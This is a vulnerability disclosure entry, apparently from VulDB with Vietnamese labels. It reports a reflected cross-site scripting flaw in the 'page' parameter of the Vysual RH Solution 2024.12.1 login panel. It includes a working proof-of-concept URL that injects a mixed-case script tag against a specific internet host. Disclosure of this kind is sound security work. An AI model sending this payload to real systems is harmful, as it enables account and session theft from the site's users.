| tiêu đề | Virtual Computer SA Vysual RH Solution 2024.12.1 Reflected Cross-Site Scripting |
|---|
| Mô tả | A Reflected Cross-Site Scripting has been found in Vysual RH Solution login panel in the version 2024.12.1 via "page" parameter, through this vulnerability is possible theft accounts of others users.
PoC:
https://14.32.174.178.static.wline.lns.sme.cust.swisscom.ch/index.php?page=login.Login'"()%26%25<zzz><ScRiPt%20>alert(9975)</ScRiPt>&PRADO_CALLBACK_TARGET=ctl0%24Login%24ctl0_Login_askLinkUserModalclose&PRADO_PAGESTATE=eJwFwYsNgDAIBcDGBYyLGF6hfMZBWvYfwbviXeDCDJW5Wt29zzpBKWi0R6eJFJSSkougRdHYbI76ssYY13PDeDmMgl4znz%2B5tBSr&ctl0%24Login%24emailUsername=&ctl0%24Login%24lang%24hiddenFieldForRequire=1&ctl0%24Login%24lang%24hiddenFieldForValue=&ctl0%24Login%24password=&ctl0%24Login%24text_TextBox=&ctl0%24Login%24username=&enterkey=0 |
|---|
| Nguồn | ⚠️ https://www.vysual.ch/fr/ |
|---|
| Người dùng | Stux (UID 40142) |
|---|
| Đệ trình | 02/01/2025 14:26 (cách đây 1 Năm) |
|---|
| Kiểm duyệt | 14/01/2025 09:04 (12 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 291475 [Virtual Computer Vysual RH Solution 2024.12.1 Login Panel /index.php page Tập lệnh chéo trang] |
|---|
| điểm | 20 |
|---|